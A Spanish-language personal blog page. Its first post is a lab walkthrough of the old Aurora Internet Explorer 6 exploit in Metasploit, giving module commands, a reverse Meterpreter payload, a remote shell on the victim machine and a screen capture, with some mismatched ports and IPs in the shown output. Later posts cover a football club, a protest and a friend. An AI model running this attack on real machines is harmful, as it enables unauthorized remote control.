Hoy hice una prueba de penetracion y salio todo ok

primero la penetracion se hizo a IE 6 no lo he probado en otro es una falla de seguridad en IE q permite tomar control de la shell de la maquina atacada con locual podrias bajar subir archivos o ejecutar programas en la pc victima

herramientas usadas
- Metasploit

Victima
- IE 6

escenario :

tienes una maquina A y una maquina B y necesitas entrar en  la maquina con la maquina A
la maquina A con ip 192.168.0.6 y la B con 192.168.0.51

lo primero q tienes q hacer es instalar en ala maquina atacante el programa de penetracion Metasploit  q es un opensource q lo puedes encontrar en aqui esto te instala la herramientas para penetrar
cuando hayas de terminado de instalar debes de ejecutar el programa y seguir estos pasos
  en la shell q te aparece escribe



msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.0.6
msf exploit(ie_aurora) > set LPORT 4446
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

 hasta ahora has cargado el exploit  parametrizado la ip el puerto y el servidor web
set LHOST define la ip
set LPORT define el puerto a utilizar
set URIPATH / define q tu sitio web es de raiz
  exploit ejecuta el exploit y levanta el server web q espera q alguien le haga el requerimiento a el




ahora desde la maquina victima  abre con IE un ventana y pon http://192.168.0.6:800/

veras este mensaje

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.6:4446 -> 192.168.0.51:1514)


acabas de abrir una sesion

 escribe estos parametros y lista  abres una session y es como si estubieras en la maquina

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer




meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>  



si quieres caopturar la pantalla en un bpm


meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp




para mas informacion


http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html

si te gusta los videos

http://www.mygeekside.com/?p=767

¿Cree usted que barcelona si entrena en Quito dara resultados?

El Barcelona Sporting Club, es una institución deportiva de la ciudad de Guayaquil, en la provincia de Guayas, en Ecuador. Fue fundado el 1 de mayo de 1925 por un grupo de jóvenes futbolistas aficionados, entre los cuales se encontraban varios catalanes.

Uno de sus hechos distintivos es la enorme masa de social y de fanáticos, con lo cual ha sido varias veces denominado como el equipo más popular del país mediante encuestas y la reacción de sus hinchas a cada ciudad que visita el equipo guayaquileño.

Con trece campeonatos nacionales, es el equipo que más títulos ha conseguido en el ámbito nacional, junto al Club Deportivo El Nacional de la ciudad de Quito.[5] Ha disputado en dos ocasiones la final de la Copa Libertadores de América, en 1990 y 1998, quedando en ambas vicecampeón. En el 2008, su sección de baloncesto quedó campeón en la Liga Nacional de Básquet 2008 de Ecuador.

Entre las características del Barcelona SC está su carácter polideportivo. Su actividad principal es el fútbol profesional y actualmente se desempeña en la Serie A del Campeonato Ecuatoriano de Fútbol. Además del fútbol, la institución cuenta con secciones profesionales de baloncesto, bolos, boxeo, natación, volley, béisbol, fútbol sala, atletismo y tenis.

El equipo mantiene una rivalidad histórica con el Club Sport Emelec, equipo de la misma ciudad, con el cual juega el derbi de mayor trascendencia en el país denomidado Clásico del Astillero

Tomado de wikipea para mas informacion



un video para los fans de barcelona

Y con solo 300 dolares

acabo de encotrar un largometraje echo con tan solo 300 dolares imaginen con 30000 millones pues si esto es lo que le ofrecieron por hacer una pelicula ..  vean el vio y me cuentan

Carteles en la ciudad

Hoy tengo q manifestar mi completo rechazo ante lo que considero un abuso de poder y una falta de conciencia asia la ciudadania , es una pena ver como las libertades constitucionales son violentadas de manera tan descarada y como se politiza un tema que es un derecho de todos nosotros..

La semana pasada dos ciudadanos fueron puestos en presion por poner cartelones y que pasa cuando una
sola persona dice lo que quiere sin miramientos todos los sabados dando la impresion de ser que solo el tiene la razon y q es su majestad  yo le recuerdo q aqui ya se han ido tres antes de el ..  por eso seria bueno rectificar y aceptar las criticas como un buen escuchador ...


para las informacion les dejo este link del universo
http://www.eluniverso.com/2009/11/05/1/1355/planton-protesto-detenidos.html?p=1354&m=2175

Bienvenida nuevamente

El lunes pude despues de 3 años habilitar mi blog q lo hice hace 5 años atras estoy alegre tube q hacer quiromancias desde hacer ingerieria social a mi antigua cuenta de hotmail q por cierto tambien recupere y vaya si que me costo recuperar este blog q añoraba por  bastante tiempo ..


pronto subire algunos temas de sistemas q sera  de interes general hasta la proxima entrega ...

Para mi mejor amiga

todos tenemos una (o) mejor amiga y es bueno recordarle que siempre nos acordamos de ella
esta va por ti mi querida mayra
Recuerdo cuando te conoci quien diria que llegariamos a ser buenos amigos que digo super amigos te quiero un monto mi mayra bella
por que eres como el mar libre recorres el mundo con el pensamiento sabes que es lo que quieres no temes
tienes la fuerza del mar para decir las verdades aunque duelan pero tienes la razon ves lo que yo puedo ver tu te preocupas de todos y yo me preocupo por ti somos como ñaños
eres como el cielo que contemplo en las noches no traicionas no mientes (jjajajj mentirosa)
te quiero por que eres mi mejor amiga mi mejor compañera
Respeto tus deciones aunque aveces soy un poco cerrado y tu ahi estas sonriendo
no tengo que escribir tu sabes que te admiro
Ve sigue tus sueños tus anhelos disfruta de tu vida
Y por cierto si el gordo lee esto ya sabes gordo que yo la quiero vastante y que tu eres su enamorado y lo respeto y que un buen amigo debe decir la verdad siempre y yo digo lo que siento mi amor por ella es diferente al tuyo tu la amas al igual que yo pero yo la cuido para ti jajajaj y tu sabes que puedes confiar en este loco jeejejej
nos vemos muchachos

este es para mi mejor amiga Mayra Vera